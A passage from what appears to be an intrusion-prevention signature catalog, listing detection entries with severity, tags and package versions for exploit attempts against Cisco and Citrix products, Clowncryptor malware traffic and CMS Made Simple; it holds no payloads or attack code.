Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1226-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Savelicensefiletoserver-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Savezoneinputfiletoserver-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Savezoneinputfiletoserver-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Securitymanager-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1220-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Securitymanager-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Cisco-Data-Center-Network-Manager-Storefilecontentinfs-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Storefilecontentinfs-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-Hyperflex-Hx-Auth-Handling-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems HyperFlex Software detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco HyperFlex, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1573-5242
Vulnerability: Cisco-Hyperflex-Hx-Auth-Handling-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Cisco-Hyperflex-Hx-Storfs-asup-Handling-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems HyperFlex Software detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco HyperFlex, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: Cisco-Hyperflex-Hx-Storfs-asup-Handling-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Cisco-IOS-HTTP-Server-Cross-Site-Scripting

About this situation: Cross site scripting in the Cisco IOS HTTP Server
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco IOS HTTP Server, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-787-5211
Vulnerability: Cisco-IOS-Server-HTTP-Interface-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems IOS XE detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2023, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1647-5242
Vulnerability: Cisco-IOS-XE-Webui-Command-Injection
Description:
Back to top

HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12650

About this situation: An attempt to exploit a vulnerability in Cisco IOS XE detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2019, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12650
Description:
Back to top

HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12651

About this situation: An attempt to exploit a vulnerability in Cisco IOS XE detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2019, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12651
Description:
Back to top

HTTP_CRL-Cisco-Network-Registrar-Default-Credentials-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Cisco Network Registrar (CUPS) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Network Registrar, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1583-5242
Vulnerability: Cisco-Network-Registrar-Default-Credentials-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Cisco-Nexus-Dashboard-Fabric-Controller-Amf-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Cisco Systems Nexus Dashboard Fabric Controller detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Nexus Dashboard Fabric Controller, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1505-5242
Last changed: sgpkg-ips-1505-5242
Vulnerability: Cisco-Nexus-Dashboard-Fabric-Controller-Amf-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Cisco-Prime-Collaboration-Provisioning-Licensestatus-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Collaboration Provisioning detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Collaboration Provisioning, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-944-5242
Vulnerability: Cisco-Prime-Collaboration-Provisioning-Licensestatus-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-Cisco-Prime-Collaboration-Provisioning-Logconfigtracer.jsp-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Collaboration Provisioning detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Collaboration Provisioning, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-970-5242
Vulnerability: Cisco-Prime-Collaboration-Provisioning-Logconfigtracer.jsp-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-Prime-Data-Center-Network-Manager-Downloadservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-559-5211
Vulnerability: Cisco-Prime-Data-Center-Network-Manager-Downloadservlet-Information-Disclosure
Description:
Back to top

HTTP_CRL-Cisco-Prime-Data-Center-Network-Manager-Processimagesave.jsp-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Cisco-Prime-Data-Center-Network-Manager-Processimagesave-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Cisco-Prime-Infrastructure-And-Dcnm-Xmpfileuploadservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Data Center Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, Cisco Systems Prime Infrastructure, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1070-5242
Vulnerability: Cisco-Prime-Infrastructure-And-Dcnm-Xmpfileuploadservlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-Prime-Infrastructure-And-Epnm-Dashboardrenderer-XML-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems Evolved Programmable Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Infrastructure, Cisco Systems Evolved Programmable Network Manager, CVE2017, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-941-5242
Vulnerability: Cisco-Prime-Infrastructure-And-Epnm-XML-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Cisco-Prime-Infrastructure-And-Epnm-Systempreferences_configurable-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Cisco Systems Evolved Programmable Network Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Infrastructure, Cisco Systems Evolved Programmable Network Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-949-5242
Vulnerability: Cisco-Systempreferences_configurable-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Cisco-Prime-Network-Analysis-Module-Graph-Sfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Network Analysis Module detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Network Analysis Module, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: Cisco-Prime-Network-Analysis-Module-Graph-Sfile-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-Router-Management-Interface-RCE

About this situation: An attempt to exploit a vulnerability in Cisco Router Management Interface detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Router, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Cisco-Router-Management-Interface-RCE
Description:
Back to top

HTTP_CRL-Cisco-RV-Series-Router-Remote-Code-Execution-CVE-2022-20699

About this situation: An attempt to exploit a vulnerability in Cisco RV Routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Router, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1444-5242
Vulnerability: Cisco-RV-Series-Router-Remote-Code-Execution-CVE-2022-20699
Description:
Back to top

HTTP_CRL-Cisco-RV320-And-RV325-Information-Disclosure-CVE-2019-1653

About this situation: An attempt to exploit a vulnerability in a Cisco RV320 or RV325 router detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Router, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Cisco-RV320-And-RV325-Information-Disclosure-CVE-2019-1653
Description:
Back to top

HTTP_CRL-Cisco-RV320-And-RV325-Remote-Code-Execution-CVE-2019-1652

About this situation: An attempt to exploit a vulnerability in a Cisco RV320 or RV325 router detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Router, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Cisco-RV320-And-RV325-Remote-Code-Execution-CVE-2019-1652
Description:
Back to top

HTTP_CRL-Cisco-SA520W-Security-Appliance-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco SA520W detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco SA500 Series Security Appliances, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Vulnerability: Cisco-SA520W-Security-Appliance-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-SD-WAN-Solution-Vmanage-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems SD-WAN Solution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems SD-WAN Solution, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1244-5242
Vulnerability: Cisco-SD-WAN-Solution-Vmanage-SQL-Injection
Description:
Back to top

HTTP_CRL-Cisco-Secure-Access-Control-Server-UCP-Application-CSuserCGI.exe-BOF

About this situation: An attempt to exploit buffer overflow vulnerability in the Cisco User-Changeable Password (UCP) application detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Cisco Systems UCP, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP_Cisco-Secure-Access-Control-Server-UCP-Application-CSuserCGI.exe-BOF
Description:
Back to top

HTTP_CRL-Cisco-Secure-ACS-Unauthorized-Password-Change

About this situation: An attempt to exploit a Cisco Secure ACS Unauthorized Password Change vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Cisco, Any Hardware, Cisco Secure ACS, CVE2011, Cisco not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-740-5211
Vulnerability: Cisco-Secure-ACS-Unauthorized-Password-Change
Description:
Back to top

HTTP_CRL-Cisco-Secure-ACS-Web-Management-Interface-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Cisco Secure ACS was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Secure ACS, CVE2003, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Cisco-Secure-ACS-Web-Management-Interface-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Cisco-Security-Manager-Authtokenservlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Cisco Systems Cisco Security Manager (CSM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Cisco Security Manager (CSM), CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: Cisco-Security-Manager-Authtokenservlet-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Cisco-Security-Manager-Ctmservlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Cisco Systems Cisco Security Manager (CSM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Cisco Security Manager (CSM), CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: Cisco-Security-Manager-Ctmservlet-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Cisco-Security-Manager-Secretservice.jsp-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Cisco Systems Cisco Security Manager (CSM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Cisco Security Manager (CSM), CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: Cisco-Security-Manager-Secretservice.jsp-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Cisco-UCS-Director-Downloadfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems UCS Director detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1246-5242
Vulnerability: Cisco-UCS-Director-Downloadfile-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-UCS-Director-Savestaticconfig-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems UCS Director detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, Cisco UCS Director Express for Big Data, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Cisco-UCS-Director-Savestaticconfig-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-UCS-Director-Savewindowsnetworkconfig-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems UCS Director detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Cisco-UCS-Director-Savewindowsnetworkconfig-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-UCS-Director-Scriptmoduleaddjarpage-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems UCS Director detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: Cisco-UCS-Director-Scriptmoduleaddjarpage-Directory-Traversal
Description:
Back to top

HTTP_CRL-Cisco-UCS-Director-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in Cisco UCS Director detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1614-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Cisco-UCS-Director-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Cisco-Unified-Communications-Manager-Multiple-SQL-Injections

About this situation: An attempt to exploit SQL injection vulnerability in Cisco Unified Communications Manager
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Unified Communications Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-1706-5242
Vulnerability: Cisco-Unified-Communications-Manager-Multiple-SQL-Injections
Description:
Back to top

HTTP_CRL-Citrix-Access-Gateway-Command-Execution

About this situation: An attempt to exploit a Citrix Access Gateway Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Access Gateway, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-716-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: Citrix-Access-Gateway-Command-Execution
Description:
Back to top

HTTP_CRL-Citrix-Authorization-Bypass-CVE-2020-8193

About this situation: An attempt to exploit a vulnerability in Citrix detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, Citrix SDWAN WANOP, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1286-5242
Vulnerability: Citrix-Authorization-Bypass-CVE-2020-8193
Description:
Back to top

HTTP_CRL-Citrix-Code-Injection-CVE-2020-8194

About this situation: An attempt to exploit a vulnerability in Citrix detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, Citrix SDWAN WANOP, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1262-5242
Vulnerability: Citrix-Code-Injection-CVE-2020-8194
Description:
Back to top

HTTP_CRL-Citrix-Code-Injection-CVE-2023-3519

About this situation: An attempt to exploit a vulnerability in Citrix detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1615-5242
Last changed: sgpkg-ips-1615-5242
Vulnerability: Citrix-Code-Injection-CVE-2023-3519
Description:
Back to top

HTTP_CRL-Citrix-Cross-Site-Scripting-CVE-2020-8191

About this situation: An attempt to exploit a vulnerability in Citrix detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, Citrix SDWAN WANOP, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1262-5242
Vulnerability: Citrix-Cross-Site-Scripting-CVE-2020-8191
Description:
Back to top

HTTP_CRL-Citrix-Forced-New-nsroot-Session

About this situation: A Citrix request forcing a new session for nsroot was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, Citrix SDWAN WANOP, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1263-5242
Vulnerability: Citrix-Authorization-Bypass-CVE-2020-8193
Description:
Back to top

HTTP_CRL-Citrix-Path-Traversal-CVE-2019-19781

About this situation: An attempt to exploit a vulnerability in Citrix detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1214-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Citrix-Path-Traversal-CVE-2019-19781
Description:
Back to top

HTTP_CRL-Citrix-SD-WAN-Command-Injection-CVE-2019-12991

About this situation: An attempt to exploit a vulnerability in Citrix SD-WAN detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix SD-WAN, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Vulnerability: Citrix-SD-WAN-Command-Injection-CVE-2019-12991
Description:
Back to top

HTTP_CRL-Citrix-SD-WAN-SQL-Injection-CVE-2019-12989

About this situation: An attempt to exploit a vulnerability in Citrix SD-WAN detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix SD-WAN, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Vulnerability: Citrix-SD-WAN-SQL-Injection-CVE-2019-12989
Description:
Back to top

HTTP_CRL-Citrix-ShareFile-Storage-Zones-Controller-Neatupload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Citrix Systems ShareFile StorageZones Controller detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Systems ShareFile StorageZones Controller, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Vulnerability: Citrix-ShareFile-Storage-Zones-Controller-Neatupload-Directory-Traversal
Description:
Back to top

HTTP_CRL-Citrix-ShareFile-Storage-Zones-Controller-Processrawpostedfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Citrix Systems ShareFile StorageZones Controller detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Systems ShareFile StorageZones Controller, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1618-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Citrix-ShareFile-Storage-Zones-Controller-Directory-Traversal
Description:
Back to top

HTTP_CRL-Citrix-XenApp-Xendesktop-Xml-Service-Interface-Uninitialized-Pointer

About this situation: An attempt to exploit a vulnerability in Citrix Systems Presentation Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Presentation Server, Citrix XenApp, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-593-5211
Vulnerability: Citrix-XenApp-And-Xendesktop-Xml-Service-Interface-Uninitialized-Pointer
Description:
Back to top

HTTP_CRL-Clowncryptor-Infection-Traffic

About this situation: Clowncryptor infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Clowncryptor-Infection-Traffic
Description:
Back to top

HTTP_CRL-CMS-Made-Simple-Login.php-Remote-Password-Reset-Vulnerability

About this situation: An attempt to exploit a vulnerability in CMS Made Simple detected
Context: HTTP Normalized Request-Line
Severity: 7
